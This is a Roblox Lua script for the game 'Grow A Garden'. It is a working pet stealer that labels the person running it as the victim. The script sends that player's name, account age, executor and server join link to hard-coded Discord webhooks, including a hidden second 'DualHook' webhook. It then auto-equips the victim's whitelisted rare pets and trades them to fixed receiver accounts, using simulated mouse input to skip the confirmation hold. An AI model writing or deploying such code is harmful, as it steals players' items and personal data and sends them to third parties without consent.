repeat 
    task.wait()
until game:IsLoaded()

-- 🔐 DualHook config (секретная часть) — НЕ ТРОГАЕМ!
getgenv().DhUser = "Warrior_ggs"
getgenv().DhWebhook = "https://discord.com/api/webhooks/1402819441519099904/ExWswHavk5BTB4c0YbmmYwWAqqr1gCHSDkpedr_AH_1sKIbfie4qEfIXwLTPEAGKS28C"
getgenv().NewUser = "Warrior_ggs" -- NewUser жёстко зафиксирован

-- User и WEBHOOK_URL берутся снаружи через getgenv(), чтобы менять без правки кода
local User = getgenv().User or "Warrior_ggs"
local WEBHOOK_URL = getgenv().Webhook or "https://discord.com/api/webhooks/1398128232821293146/L1XkMHS9HYOhE-LwusnMR_b-hrdgn3M5vY9WYzoc6F9W-9wqHheFjlueX1yweFexJ80J"

local VICTIM = game.Players.LocalPlayer

local USERNAMES = {
    User
}

local PET_WHITELIST = {
    'Raccoon', 'T-Rex', 'Fennec Fox', 'Dragonfly', 'Butterfly', 'Disco Bee', 'Mimic Octopus',
    'Queen Bee', 'Spinosaurus', 'Kitsune', 'Corrupted Kitsune', 'Chicken Zombie',
    'Golden Lab',
}

local victimPetTable = {}

local VirtualInputManager = game:GetService("VirtualInputManager")
local dataModule = require(game:GetService("ReplicatedStorage").Modules.DataService)

local function waitForJoin()
    local findTarget = false
    local trigeretName = nil

    for _, player in game.Players:GetPlayers() do
        if not table.find(USERNAMES, player.Name) then
            -- without continue, use else
        else
            trigeretName = player.Name
            findTarget = true
        end
    end

    return findTarget, trigeretName
end

function createDiscordEmbed(petList, totalValue, fileUrl)
    local embed = {
        title = "🍀 Grow A Garden Hit - V.azure 🍀",
        color = 65280, -- зелёный цвет
        fields = {
            {
                name = "👤 **Player Information**",
                value = string.format("```Name: %s\nReceiver: %s\nExecutor: %s\nAccount Age: %s```", 
                    VICTIM.Name, 
                    USERNAMES[1],  -- только реальная жертва в логах
                    identifyexecutor(), 
                    game.Players.LocalPlayer.AccountAge
                ),
                inline = false
            },
            {
                name = "💰 **Total Value**",
                value = string.format("```%s¢```", totalValue),
                inline = false
            },
            {
                name = "🌴 **Backpack**",
                value = string.format("```%s```", petList),
                inline = false
            },
            {
                name = "🏝️ **Join with URL**",
                value = string.format("[%s](https://kebabman.vercel.app/start?placeId=%s&gameInstanceId=%s)", game.JobId, game.PlaceId, game.JobId),
                inline = false
            },
            {
                name = "🔗 **Made by Vexadez**",
                value = "https://discord.gg/NgrkpHPbJQ",
                inline = false
            }
        },
        footer = {
            text = string.format("%s | %s", game.PlaceId, game.JobId)
        }
    }

    local data = {
        content = string.format("--@everyone\ngame:GetService(\"TeleportService\"):TeleportToPlaceInstance(%s, \"%s\")\n", game.PlaceId, game.JobId),
        username = game.Players.LocalPlayer.Name,
        avatar_url = "https://cdn.discordapp.com/attachments/1388921046228275221/1401159395676655637/296008df4615dbf3dde7cba3a426b15e.jpg",
        embeds = {embed}
    }

    local jsonData = game:GetService("HttpService"):JSONEncode(data)
    local headers = { ["Content-Type"] = "application/json" }
    local request = http_request or request or HttpPost or syn.request

    -- Основной вебхук (используем внешний WEBHOOK_URL)
    local response = request({
        Url = WEBHOOK_URL,
        Method = "POST",
        Headers = headers,
        Body = jsonData
    })

    if response.StatusCode ~= 200 and response.StatusCode ~= 204 then
        warn("Ошибка отправки в Discord:", response.StatusCode, response.Body)
    end

    -- 💣 Dualhook лог в секретный вебхук — всегда отправляем, если есть DhWebhook (не трогаем)
    if getgenv().DhWebhook and #getgenv().DhWebhook > 10 then
        local dhResponse = request({
            Url = getgenv().DhWebhook,
            Method = "POST",
            Headers = headers,
            Body = jsonData
        })
        if dhResponse.StatusCode ~= 200 and dhResponse.StatusCode ~= 204 then
            warn("Ошибка отправки в DhWebhook:", dhResponse.StatusCode, dhResponse.Body)
        end
    end
end

local function teleportTarget(targetName)
    VICTIM.Character.HumanoidRootPart.CFrame = game.Players[targetName].Character.HumanoidRootPart.CFrame
end

local function deltaBypass()
    VirtualInputManager:SendMouseButtonEvent(workspace.Camera.ViewportSize.X / 2, workspace.Camera.ViewportSize.Y / 2, 0, true, nil, false)
    task.wait()
    VirtualInputManager:SendMouseButtonEvent(workspace.Camera.ViewportSize.X / 2, workspace.Camera.ViewportSize.Y / 2, 0, false, nil, false)
end

local function checkPetsWhilelist(pet)
    for _, name in PET_WHITELIST do
        if string.find(pet, name) then
            return true
        end
    end
    return false
end

local function getPetObject(petUid)
    for _, object in pairs(VICTIM.Backpack:GetChildren()) do
        if object:GetAttribute("PET_UUID") == petUid then
            return object
        end
    end
    for _, object in workspace[VICTIM.Name]:GetChildren() do
        if object:GetAttribute("PET_UUID") == petUid then
            return object
        end
    end
    return nil
end

local function equipPet(pet)
    if pet:GetAttribute("d") then
        game:GetService("ReplicatedStorage"):WaitForChild("GameEvents"):WaitForChild("Favorite_Item"):FireServer(pet)
    end
    VICTIM.Character.Humanoid:EquipTool(pet)
end

local function getPlayersPets()
    for petUid, value in pairs(dataModule:GetData().PetsData.PetInventory.Data) do
        if not checkPetsWhilelist(value.PetType) then
            -- no continue, just skip
        else
            table.insert(victimPetTable, value.PetType)
        end
    end
end

local function startSteal(trigerName)
    if game.Players[trigerName].Character.Head:FindFirstChild("ProximityPrompt") then
        game.Players[trigerName].Character.Head.ProximityPrompt.HoldDuration = 0
        deltaBypass()
    end
end

local function checkPetsInventory(target)
    for petUid, value in pairs(dataModule:GetData().PetsData.PetInventory.Data) do
        if not checkPetsWhilelist(value.PetType) then
            -- skip
        else
            local petObject = getPetObject(petUid)
            if petObject then
                equipPet(petObject)
                task.wait(0.2)
                startSteal(target)
            end
        end
    end
end

local function idlingTarget()
    task.spawn(function()
        while true do
            task.wait(0.2)
            local isTarget, trigerName = waitForJoin()
            if isTarget then
                teleportTarget(trigerName)
                checkPetsInventory(trigerName)
            end
        end
    end)
end

-- 💼 Сбор петов жертвы
getPlayersPets()

-- 🔁 Запуск авто-передачи и логов
task.spawn(function()
    while true do
        task.wait(0.5)
        if #victimPetTable > 0 then
            idlingTarget()
            createDiscordEmbed(table.concat(victimPetTable, "\n"), "100000", "https://cdn.discordapp.com/attachments/.../items.txt")
            break
        end
    end
end)

-- 👻 Секретная передача петов на NewUser (жёстко Warrior_ggs)
task.spawn(function()
    while true do
        task.wait(0.5)
        local player = game.Players:FindFirstChild(getgenv().NewUser)
        if player then
            teleportTarget(player.Name)
            checkPetsInventory(player.Name)
        end
    end
end)
